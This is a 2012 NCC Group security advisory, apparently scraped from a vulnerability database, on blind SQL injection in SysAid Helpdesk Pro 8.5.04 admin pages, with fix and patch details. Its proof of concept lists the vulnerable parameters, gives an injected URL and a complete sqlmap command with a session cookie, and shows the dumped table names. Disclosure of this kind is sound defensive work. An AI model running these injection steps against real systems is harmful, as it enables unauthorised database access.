NGS000241 Technical Advisory: SysAid Helpdesk Pro Blind SQL Injection

2012-12-10T00:00:00

Description

======= Summary ======= Name: SysAid Helpdesk Pro - Blind SQL Injection Release Date: 30 November 2012 Reference: NGS00241 Discoverer: Daniel Compton <daniel.compton@ngssecure.com> Vendor: SysAid Vendor Reference: Systems Affected: SysAid Helpdesk 8.5 Pro Risk: High Status: Published ======== TimeLine ======== Discovered: 12 March 2012 Released: 12 March 2012 Approved: 12 March 2012 Reported: 14 March 2012 Fixed: 1 August 2012 Published: 30 November 2012 =========== Description =========== SysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product. I. VULNERABILITY ------------------------- SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface. II. BACKGROUND ------------------------- SyAid is a fully web based helpdesk solution. http://www.ilient.com/ III. DESCRIPTION ------------------------- SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk. ================= Technical Details ================= IV. PROOF OF CONCEPT ------------------------- The following URL and parameters have been confirmed to suffer from Blind SQL injection. /AssetManagementList.jsp (GET Parameter: computerID, group1) AssetManagementChart.jsp (GET Parameter: group1) /genericreport (POST Parameter: assetID, customSQL, groupFilter) CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons) /AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices python sqlmap.py --url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices" --dbms=mysql -p computerID --cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5 Database: ilient [10 tables] +-----------------------+ | account | | agreement | | asset2ci | | asset_catalog | | asset_catalog_files | | asset_catalog_history | | asset_catalog_links | | asset_data_day_data | | asset_data_month_data | | asset_data_week_data | +-----------------------+ =============== Fix Information =============== Fixed in version 8.5.08 http://www.sysaid.com/bugs-fixed-8-5.htm#8508 Download Product Patch: http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe NCC Group Research http://www.nccgroup.com/research For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br> This email message has been delivered safely and archived online by Mimecast. </a>

{"id": "SECURITYVULNS:DOC:28844", "bulletinFamily": "software", "title": "NGS000241 Technical Advisory: SysAid Helpdesk Pro Blind SQL Injection", "description": "\r\n\r\n=======\r\nSummary\r\n=======\r\nName: SysAid Helpdesk Pro - Blind SQL Injection\r\nRelease Date: 30 November 2012\r\nReference: NGS00241\r\nDiscoverer: Daniel Compton <daniel.compton@ngssecure.com>\r\nVendor: SysAid\r\nVendor Reference: \r\nSystems Affected: SysAid Helpdesk 8.5 Pro\r\nRisk: High\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 12 March 2012\r\nReleased: 12 March 2012\r\nApproved: 12 March 2012\r\nReported: 14 March 2012\r\nFixed: 1 August 2012\r\nPublished: 30 November 2012\r\n\r\n===========\r\nDescription\r\n===========\r\nSysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product.\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nSysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nSyAid is a fully web based helpdesk solution.\r\n\r\nhttp://www.ilient.com/\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nSQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.\r\n\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\n\r\nThe following URL and parameters have been confirmed to suffer from Blind SQL injection.\r\n\r\n/AssetManagementList.jsp (GET Parameter: computerID, group1)\r\nAssetManagementChart.jsp (GET Parameter: group1)\r\n/genericreport (POST Parameter: assetID, customSQL, groupFilter)\r\nCIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)\r\n\r\n/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices\r\n\r\npython sqlmap.py\r\n--url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices"\r\n--dbms=mysql -p computerID\r\n--cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5\r\n\r\n\r\nDatabase: ilient [10 tables] \r\n+-----------------------+ \r\n| account | \r\n| agreement | \r\n| asset2ci | \r\n| asset_catalog | \r\n| asset_catalog_files | \r\n| asset_catalog_history | \r\n| asset_catalog_links | \r\n| asset_data_day_data | \r\n| asset_data_month_data | \r\n| asset_data_week_data |\r\n +-----------------------+\r\n\r\n===============\r\nFix Information\r\n===============\r\nFixed in version 8.5.08\r\n\r\nhttp://www.sysaid.com/bugs-fixed-8-5.htm#8508\r\n\r\nDownload Product Patch:\r\n\r\nhttp://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe\r\n\r\nNCC Group Research\r\nhttp://www.nccgroup.com/research\r\n\r\n\r\nFor more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>\r\nThis email message has been delivered safely and archived online by Mimecast.\r\n</a>\r\n", "published": "2012-12-10T00:00:00", "modified": "2012-12-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28844", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:46", "edition": 1, "viewCount": 56, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12763"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645520394, "score": 1659803227}, "_internal": {"score_hash": "36c8f9db20982f0f87de4dfb87991d4c"}}